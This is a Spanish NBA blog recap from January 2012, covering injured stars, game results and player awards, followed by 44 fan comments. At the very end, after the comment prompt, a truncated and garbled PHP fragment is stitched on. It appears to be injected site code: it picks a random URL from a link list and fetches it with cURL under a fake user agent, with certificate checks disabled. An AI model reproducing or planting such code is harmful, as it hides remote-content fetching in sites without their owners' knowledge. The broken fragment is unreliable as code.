La Crónica: Ausencias

18 de January de 2012 por TheDeerHunter

Seguimos a vueltas con varias lesiones muy significativas. Curiosamente anoche no supusieron un hándicap insalvable para sus equipos.

Los únicos que no pudieron sobreponerse a la lesión de su “ilustre” fueron los Clippers. Los Jazz les pasaron por encima (79-108), notándose la ausencia de Chris Paul en una merma importante en los porcentajes de tiro. Millsap y CJ Miles fueron los mejores por los Jazz y lo positivo para los Clippers fue observar buenas maneras en Courtney Fortson.

Después, los que más cerca estuvieron de notar su baja estelar fueron los Heat, sin Wade. Los Spurs comenzaron arrasando en la primera parte pero se hundieron en la segunda (98-120). El resurgir de Mike Miller y LeBron James fue la clave. Chris Bosh también estuvo sobresaliente. El equipo de Popovic todavía no se ha estrenado fuera de casa.

En cambio, los Bulls no tuvieron problemas para doblegar a los Suns (97-118). La defensa de este equipo es una auténtica calamidad y lo aprovecharon Boozer y CJ Watson para lucirse, además de 4 toros más en dobles figuras. Buen partido de Nash y Gortat, al menos en ataque. Y los Warriors casi se han acostumbrado a jugar sin Stephen Curry gracias, en parte, a que “Nanet” Robinson se ha adapatado al equipo a las mil maravillas. Igualado choque contra los Cavs que terminaron flojeando en el último cuarto para satisfacción de David Lee y los suyos (105-95).

En el resto de encuentros, Howard firmó un 25-17 para tumbar a los Bobcats (89-96), Dalembert volvió a ser el líder de los Rockets en su cuarta victoria consecutiva (80-97), ésta ante los Pistons y un inesperado subidón de Corey Brewer le dió la victoria a Denver en Milwaukee. Alguien debería explicarme la causa de los vaivenes en la rotación y el rendimiento del equipo de los ciervos (105-95).

PREMIOS

MVP: Impresionante exhibición de los Heat de la mano de Chris Bosh y LeBron James. El primero acabó con 30 puntos, 8 rebotes, 5 asistencias y 4 robos y el segundo con 33 puntos, 5 rebotes y 10 asistencias. El 25-17 de Dwight Howard también es necesario destacarlo.

Rookie: Bismack Biyombo demostró en 21 minutos lo que puede aportar a los Bobcats: 11 puntos, 10 rebotes y 4 tapones. Tobias Harris se está aprovechando de la debilidad de los Bucks en las posiciones de 3 y 4 y está encontrando minutos que está sabiendo aprovechar (14-8-3). De todas maneras, Kyrie Irving volvió a ser el mejor de los novatos: 18 puntos, 8 rebotes y 5 asistencias.

Sorpresa: A falta de Derrick Rose y sujetando a John Lucas III bien fuerte para que no se vuelva loco, CJ Watson asumió todo el protagonismo en la dirección de los Bulls. 23 puntos (8 de 12), 4 rebotes, 5 asistencias y 2 robos. Y Mike Miller volvió a lo grande: 6 de 6 en triples en 15 minutos y para casa.

Decepción: 2 de 12 en tiro, 10 puntos, 4 pérdidas… Mal, muy mal partido de Monta Ellis.

Esfuerzo en vano: Brandon Jennings está jugando, posiblemente, su mejor baloncesto desde que llegó a la liga. Anoche anotó 13 de 22 intentos, y consiguió 30 puntos que adornó con 6 asistencias y 3 robos. Desgraciadamente, de nuevo estuvo demasiado solo.

Imágenes | AP Photos / Getty Images

Comenta

44 comentarios a esta entrada

  1. melo15 dice:
    #1

    Kemba tambien hizo un buen partido 15 puntos 6 asistencias y 4 tebotes no esta mal

      Citar

  2. Denise dice:
    #2

    Grande Mike Miller, veis como no está acabado.

    Por fin un buen partido de Jameer Nelson y buena noticia para los Magic la aparicion de Von Wafer.

    Por los Bobcats, el “marido” de Melo Kemba Walker no lo hizo mal, y Henderson excelso en el tiro.
    Tyrus Thomas es un pufo, que jugador mas malo, y Boris Diaw a pesar de que no hizo mucho me gusta como jugador. El año que viene es agente libre, no sería mal fichaje para los Magic.

      Citar

  3. Sancho88 dice:
    #3

    Al nombrar a Coutney Forston se me ha venido a la memoria aquel grandullón de los Sonics… Danny Forston. Joder, que recuerdos… Pero ya he buscado y no tienen nada que ver. Lo de los Clippers es de traca, sin Paul, Mo y Bledsoe, aún les queda Billups y este Forston. En serio, no se han planteado un traspaso por Mo-Bledsoe para piyarse alguien en la zona, o rescatar a Al Thornton de los agentes libres? Los días van pasando, y siguen desaprovechando una gran oportunidad de llegar muy lejos en el Oeste…

      Citar

  4. Sancho88 dice:
    #4

    Vale, me retracto sobre Miller. Pero vamos, que ya puede espabilar con lo que cobra, que lleva temporada y media tocándose el parrús.

      Citar

  5. Sancho88 dice:
    #5

    o sus propias gónadas, para ser más exactos. xd

      Citar

  6. Nacho dice:
    #6

    Denise, he visto poco a los Magic, pero por lo que he visto, y por lo que he leído, es para sentirse orgulloso. Pasa ya de soñar con los trades y sueña que lo que hay, y con que no hagan lo que acaba de comentar Sancho sobre Miller.
    El turco estuvo brutal a la hora de romper el partido contra NY, amén de Anderson. No necesitaron a Dwight, y éste aparece ayer. Hacen coñas y Howard está en ellas. Me da que aguanta este año, y dependerá de lo que hagan en PO. Pero que no se confíe nadie de ellos porque la pueden liar. Eso sí, como se pongan en modo plufff, apaga y vámonos.
    ¡Dios! ¡Yo quiero ver asomar esa libreta por la chaqueta en otras finales! ¡Van Gundy selección!

      Citar

  7. Jose Luis dice:
    #7

    No es CJ Miles quién dirigió a los Bulls, sino CJ Watson 🙂 vamos hombre, que lo tengo en mi equipo de la hoops!! jajajaja

      Citar

  8. Sancho88 dice:
    #8

    Nacho:
    Denise, he visto poco a los Magic, pero por lo que he visto, y por lo que he leído, es para sentirse orgulloso. Pasa ya de soñar con los trades y sueña que lo que hay, y con que no hagan lo que acaba de comentar Sancho sobre Miller.
    El turco estuvo brutal a la hora de romper el partido contra NY, amén de Anderson. No necesitaron a Dwight, y éste aparece ayer. Hacen coñas y Howard está en ellas. Me da que aguanta este año, y dependerá de lo que hagan en PO. Pero que no se confíe nadie de ellos porque la pueden liar. Eso sí, como se pongan en modo plufff, apaga y vámonos.
    ¡Dios! ¡Yo quiero ver asomar esa libreta por la chaqueta en otras finales! ¡Van Gundy selección!

    En realidad, es muy cutre decirlo, pero Turkoglu es la puta clave de ese equipo. Cuando él juega bien, no pierden nunca o casi nunca. Ya digo, parece mentira que él sea el termómetro del equipo, uno de los jugadores más irregulares que hay en la liga, y que precisamente nunca ha sido all-star por ese motivo. Particularmente, yo le tengo mucho cariño porque estaba en aquellos maravillosos Kings, y hace tres años en la final contra Lakers, casi no sé decir si me trasnmitían más simpatía aquellos Magic o los propios Lakers. Con Nelson al mando, uno de los bases más infravalorados de la liga, Turkoglu, Anderson y Howard, ya solo hace falta que se reenganche Redick (a J-Rich no le veo haciendo eso, porque precisamente no está en el feeling del equipo), para llegar lejos. Además, se percibe buen rollo como tú comentas. La coña del Glen Davis, un pívot de rotación de los mejores que hay en la liga, y Von Wafer tocando la guitarra desde el banquillo. A este nivel, no sé si serán capaces de llegar a las finales de conferencia, porque la Conferencia Este está más dura que nunca, pero junto a MIami y Chicago son fijos en semifinales de conferencia. El cuarto candidato? Difícil saberlo, Philadelphia está muy fuerte, pero no tiene potencial, como siempre decimos le falta el tío que se eche el equipo a las espaldas y sea capaz de anotar 25-30 puntos en un momento dado, en playoffs. Yo veo a Indiana como el equipo tapado, silencioso, que va como la hormiguita poco a poco, y pueden ser peligrosísimos en cualquier cruce. Si consiguen asegurarse cuarta o quinta plaza de conferencia, estarán en semis seguro, y pueden dar mucha guerra.

      Citar

  9. MagicJohnson32 dice:
    #9

    Sancho88:
    Al nombrar a Coutney Forston se me ha venido a la memoria aquel grandullón de los Sonics… Danny Forston. Joder, que recuerdos…

    Vaya fenómeno era Fortson, un tipo capaz de hacer 6 faltas en 10 minutos y tener tiempo de coger 15 rebotes. Tuvo una serie de partidos en los Warriors en que rondaba los 20 puntos y 20 rebotes, y entonces se lesionó de gravedad.

      Citar

  10. MagicJohnson32 dice:
    #10

    Sancho88: En realidad, es muy cutre decirlo, pero Turkoglu es la puta clave de ese equipo. Cuando él juega bien, no pierden nunca o casi nunca. Ya digo, parece mentira que él sea el termómetro del equipo, uno de los jugadores más irregulares que hay en la liga, y que precisamente nunca ha sido all-star por ese motivo. Particularmente, yo le tengo mucho cariño porque estaba en aquellos maravillosos Kings, y hace tres años en la final contra Lakers, casi no sé decir si me trasnmitían más simpatía aquellos Magic o los propios Lakers. Con Nelson al mando, uno de los bases más infravalorados de la liga, Turkoglu, Anderson y Howard, ya solo hace falta que se reenganche Redick (a J-Rich no le veo haciendo eso, porque precisamente no está en el feeling del equipo), para llegar lejos. Además, se percibe buen rollo como tú comentas. La coña del Glen Davis, un pívot de rotación de los mejores que hay en la liga, y Von Wafer tocando la guitarra desde el banquillo. A este nivel, no sé si serán capaces de llegar a las finales de conferencia, porque la Conferencia Este está más dura que nunca, pero junto a MIami y Chicago son fijos en semifinales de conferencia. El cuarto candidato? Difícil saberlo, Philadelphia está muy fuerte, pero no tiene potencial, como siempre decimos le falta el tío que se eche el equipo a las espaldas y sea capaz de anotar 25-30 puntos en un momento dado, en playoffs. Yo veo a Indiana como el equipo tapado, silencioso, que va como la hormiguita poco a poco, y pueden ser peligrosísimos en cualquier cruce. Si consiguen asegurarse cuarta o quinta plaza de conferencia, estarán en semis seguro, y pueden dar mucha guerra.

    Estoy muy de acuerdo con lo de que Turkoglu es la clave del equipo, pero precisamente porque Nelson, como base, no aporta nada. Ni personalidad, ni dirección, ni anotación, ni defensa. Es, en mi opinión, uno de los grandes problemas de este equipo. Además, creo que ya tardan en darle la titularidad a Redick.

      Citar

  11. Txusma dice:
    #11

    De hecho, en los últimos partidos Reddick es titular por la lesión de J. Richardon. Veremos si se queda ahí cuando este vuelva.

      Citar

  12. rumbero dice:
    #12

    Vaya tela con los Jazz. +30 a LAC (ok, sin Paul) . Al estilo Magic estan, que pocos daban un duro por ellos y resulta que estan segundos en el Wild Wild West. Si a ese pedazo de juego interior (con un Millsap a un nivel tremendo) se le sumaran el Harris de antaño y un escolta decente darían más de un susto seguro.

      Citar

  13. melo15 dice:
    #13

    Pero Neloson no era un buen base?? Turkuglu no me gusta nada, ahora es un tio muy especial no creeis?? es bastante raro, ver a un Forward dirigir un equipo, ahora que lo pienso, yo si fuera profesional estaria un año en Europa para aprender a dirigir un equipo, y un año en la NCAA para darme a conocer, aparte de aprender.
    No creo que los Magic lleguen a Semis, por una razon, porque como el Turko, Reddick y J-Rich tenga el dia malo se acabo

      Citar

  14. simon dice:
    #14

    melo si juegas en Europa olvidate de ir a la NCAA, precisamente por eso no pudo jugar Kanter el año pasao en la NCAA

      Citar

  15. melo15 dice:
    #15

    A es verdad, que no puedes cobrar!!!
    Bueno pues antes a la NCAA

      Citar

  16. Kantonyo dice:
    #16

    Lo de Utah es una de las sorpresas agradables de este inicio de temporada, a pesar del 3-1 en contra inicial, segundos del oeste….

    David Lee tiene el mejor registro de Eficiencia de los últimos 5 partidos: 24,6 ptos 11,4 reb 31,8 eff

    ¿¿Estamos ante los mejores minutos de Dalembert en su carrera???? en sus 5 últimos partidos: 4 victorias: 13 ptos, 10 reb 22 eff en 29 min

      Citar

  17. Sancho88 dice:
    #17

    Bueno, lo de Dalembert a mí no me extaña. El año pasado jugó muy bien en Sacramento, tiene muy buena coordinación para ser un hombre tan grande. Además, no es nada lento y en defensa es una garantia. Muy buena pareja Scola-Dalembert. Parece que estuvieran predestinados a jugar juntos. No sé, es una impresión viéndoles jugar

      Citar

  18. Jose Luis dice:
    #18

    A mí Dalembert siempre me ha parecido un pívot muy muy válido, bueno en defensa, y en ataque aporta también. Va muy bien a las ayudas, e intimida.

      Citar

  19. Denise dice:
    #19

    Bueno voy por partes:

    – Turkoglu es el termómetro del equipo (como ya dije en el analisis de los Magic que hice). Pero lo es ahora y ya lo era en su anterior etapa. Cuando está enchufado, el equipo es otro, cuando no, el equipo parece una banda.
    – Tio, Magicjohnson, se que es tu opinión, pero Nelson es un muy buen base titular aceptable en cualquier equipo aspirante al anillo. No genera mucho juego ni reparte muchas asistencias, pero maneja bien el ritmo, es un buen anotador, tiene bastante tiro exterior y defiende aceptablemente. Siendo tú de los Lakers, ya os gustaría tener ahora mismo a vosotros un base como Nelson en el equipo. Además sus características serían las idóneas en el Kobe-Sistema de Mike Brown. Bola a Kobe y Nelson abierto por si algun día a Bryant le da por pasarsela..xD

    Y sobre Dalembert, que siga así que es mi pivot titular en la Hoops.
    Además, así a botepronto, recuerdo una exhibición brutal de Nelson en el Staples Center y otros cuantos partidos buenisimos que se ha marcado contra los Lakers.

    – Redick es un buen killer pero muy irregular. De hecho esa es la característica y la definición idónea de los Magic en las dos últimas temporadas: La irregularidad.
    A un partido pueden masacrar a cualquiera, sobre todo desde el triple (su principal arma), incluso a una serie tambien, pero no los veo como aspirantes al anillo porque sería muy dificil por no decir imposible que gente como Turkoglu, Redick, J.Rich y Ryan Anderson consigan ser minimamente regulares durante 4 rondas de serie.
    – Si no ganamos el anillo con el equipazo que teníamos en la 09-10 (no el de la final vs Lakers sino el posterior año) no creo que a corto plazo lo hagamos.

      Citar

  20. Jose Luis dice:
    #20

    Es que ese es el problema, depender del triple no es una solución para conseguir un anillo. Tiene que haber algo más de chicha, creo que con Vince Carter buscaban un escolta que anotara 20 puntos por partido con penetraciones, tiro exterior y tiros libres, algo como un segunda espada pero a un nivel alto (un Eric Gordon, Monta Ellis como han dicho por ahí, o quizá incluso Kevin Martin), y es evidente que Carter naufragó.

      Citar

  21. melo15 dice:
    #21

    si o fichando a Rudy Gay, que es un jugador buenisimo, perfecto segunda espada, y era agente libre hace una año o dos

      Citar

  22. Denise dice:
    #22

    Si, le hace falta un exterior mas consistente. Ya que las mega-estrellas están todas pilladas, un tipo Rudy-Gay o los ya citados Gordon o Monta no vendrían mal.

    Y ojo, que yo me hubiera quedado con Arenas. Para amnistiarlo y pagarle 60 kilos por estar en su casa arrascandose los eggs, hubiera sido mejor que hubiera sudado la camiseta de los Magic.
    Es más, en los primeros partidos le hubiera dando licencia para tirar, que metiera 20 y pico puntos, y después haberlo traspasado a algun desesperado como los Raptors, los Kings o los Nets.

      Citar

  23. Denise dice:
    #23

    melo15:
    si o fichando a Rudy Gay, que es un jugador buenisimo, perfecto segunda espada, y era agente libre hace una año o dos

    Melo, me has pisado el comentario con lo de Rudy Gay. Vete a estudiar que tu profe de Lengua, Don Anselmo, algun día de éstos te estrellará el blackberry contra la pared…xD

      Citar

  24. melo15 dice:
    #24

    yo no entiendo como tios como Arenas, que son buenillos, pasan a ser tan malos

      Citar

  25. melo15 dice:
    #25

    buena Denise buena jajajjajajaja

      Citar

  26. Denise dice:
    #26

    Por cierto Melo, esta noche hay un New York – Phoenix.

    Si Melo mete 40 ó 50 puntos, no te motives. Los Suns son una autentica banda. Aunque me temo que Melo se acabara llevando algun gorro de Marcin Gortat.
    Si Melo sigue en su línea y hace un partido pésimo, olvidate ya de él….y vendelo en la Hoops.

    Los mejores partidos: Orlando-San Antonio y Clippers-Mavs

      Citar

  27. MagicJohnson32 dice:
    #27

    Denise:
    – Tio, Magicjohnson, se que es tu opinión, pero Nelson es un muy buen base titular aceptable en cualquier equipo aspirante al anillo. No genera mucho juego ni reparte muchas asistencias, pero maneja bien el ritmo, es un buen anotador, tiene bastante tiro exterior y defiende aceptablemente. Siendo tú de los Lakers, ya os gustaría tener ahora mismo a vosotros un base como Nelson en el equipo. Además sus características serían las idóneas en el Kobe-Sistema de Mike Brown. Bola a Kobe y Nelson abierto por si algun día a Bryant le da por pasarsela..xD

    Si tú piensas que Nelson defiende aceptablemente, entonces esta discusión acaba aquí, jajaja…

    Y, como aficionado de Lakers, espero que el día que Fisher deje de ser nuestro titular sea por un base mejor que Nelson.

      Citar

  28. melo15 dice:
    #28

    hombre Magic ya se que Fisher es un veterano y eso, pero es de lo peor que hay, es un abujero en defensa entre otras muchas cosas

      Citar

  29. Denise dice:
    #29

    MagicJohnson32: Si tú piensas que Nelson defiende aceptablemente, entonces esta discusión acaba aquí, jajaja…

    Y, como aficionado de Lakers, espero que el día que Fisher deje de ser nuestro titular sea por un base mejor que Nelson.

    Está claro que los Lakers por historia, glamour y mercado acabará haciendose en un futuro con un base mejor que Nelson, pero si Jameer jugase ahora mismo en los Lakers, os solucionaba los problemas que teneis en esa posición. Y como ya dije, su estilo de juego encajaría muy bien en unos Lakers o en los actuales Heat donde ya son otros los que dirigen y no el base. En el Staples lo deben de conocer muy bien los aficionados.
    No es un Rondo, ni siquiera un Westbrook, pero es un base muy aceptable de nivel medio-alto perfectamente capacitado para ser el base titular de un equipo ganador.

      Citar

  30. Denise dice:
    #30

    melo15:
    abujero

    Tio, Melo, Don Anselmo te va a echar la bronca mañana. xD

      Citar

  31. Denise dice:
    #31

    Denise:

    Además, así a botepronto, recuerdo una exhibición brutal de Nelson en el Staples Center y otros cuantos partidos buenisimos que se ha marcado contra los Lakers.

    Antes de que alguien me saque números y estadísticas, recordad que en las Final de la NBA, Nelson jugó bastante mal contra los Lakers porque lo hizo renqueante y muy mal de salud tras una grave lesión que había sufrido. Llegó a las finales sin ritmo y al 50%

    No me refiero a esos partidos, sino a otros, con Nelson sano, a los Lakers se las ha liado varias veces.

      Citar

  32. melo15 dice:
    #32

    Hombre Denise, Neloson es nivel Medio, no te crezcas jejejejej.
    PD: Denise tio no seas tan exigente, no sabia si era agujero, agugero, abugero o abugero, y lo he pensado no te cras

      Citar

  33. Sancho88 dice:
    #33

    quin patiment…

      Citar

  34. melo15 dice:
    #34

    Empieza el Barça-Madrid hoy no hay basket.
    PD: Visca Barça!!!

      Citar

  35. Txusma dice:
    #35

    El fútbol en este blog ni mentarlo, eh?

      Citar

  36. melo15 dice:
    #36

    No se me ocurriria en la vida

      Citar

  37. Pop dice:
    #37

    El dia que Ricky tenga el dia un pelín tonto se planta en el cuadruple doble…

      Citar

  38. cocinitas dice:
    #38

    Denise:
    Por cierto Melo, esta noche hay un New York – Phoenix.

    Si Melo mete 40 ó 50 puntos, no te motives. Los Suns son una autentica banda. Aunque me temo que Melo se acabara llevando algun gorro de Marcin Gortat.
    Si Melo sigue en su línea y hace un partido pésimo, olvidate ya de él….y vendelo en la Hoops.

    Los mejores partidos: Orlando-San Antonio y Clippers-Mavs

    Has dado en el clavo, partido pésimo de Melo y NYK en general. Han perdido contra Suns.

      Citar

  39. cocinitas dice:
    #39

    Pop:
    El dia que Ricky tenga el dia un pelín tonto se planta en el cuadruple doble…

    Hoy 9 puntos, 7 rebotes, 8 asistencias y 6 robos( y para mi uno no se lo contaron)

      Citar

  40. HisRoyalAirness dice:
    #40

    El box score de Ricky es surrealista, no le hace justicia a su partidazo para nada. Lo dominò cuando y como quiso. Espectacular. Si en la primera parte sus compañeros hubieran metido lo fácil se iba a más de 15 asistencias.
    Ojito mañana a la penetración que hace pasàndose la bola por detrás.

    Y los Knicks que penita…D’Antoni sin Nash no es nadie. Pero nadie. Y Nash por si solo es un ídolo inmenso e inmortal

      Citar

  41. arvydas dice:
    #41

    ricky rubio cualquier dia se hace un cuadruple doble y marc como le dejen tambien…

      Citar

  42. Denise dice:
    #42

    Antes de que me zurreis…2 de 16 de Nelson y comiendose puntos de Parker. Ya sé que no está en su mejor momento, pero no es tan malo como está demostrando esta temporada.

    Y ahí se ve lo “bueno” que es Carmelo Anthony. Ante una banda como los Suns era para haber hecho mínimo más de 30 puntos con buenos %, y sin embargo, ahí lo tienes con un patético 5 de 22 y 6-8 ya para los Knicks. Este equipo no tiene solución, bueno sí, traspasar a Melo y Amare. (12 de 40 entre los dos esta noche)

    Que grande Nash y Billups. A este paso le pueden quedar al menos 2 años más de buen nivel.

      Citar

  43. Sancho88 dice:
    #43

    Ojo porque la NBA está poniendo de moda el gran tiro libre “hacerse un Rindour”. Ayer fue el turno de Granger contra los Kings. Qué despelote!!

    Por cierto, en las hightlights han bautizado a Ricky como Spanish Maravich!! wow

      Citar

  44. Sancho88 dice:
    #44

    Y pedazo de buzzerbeater del señor Billups. YES SIR

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>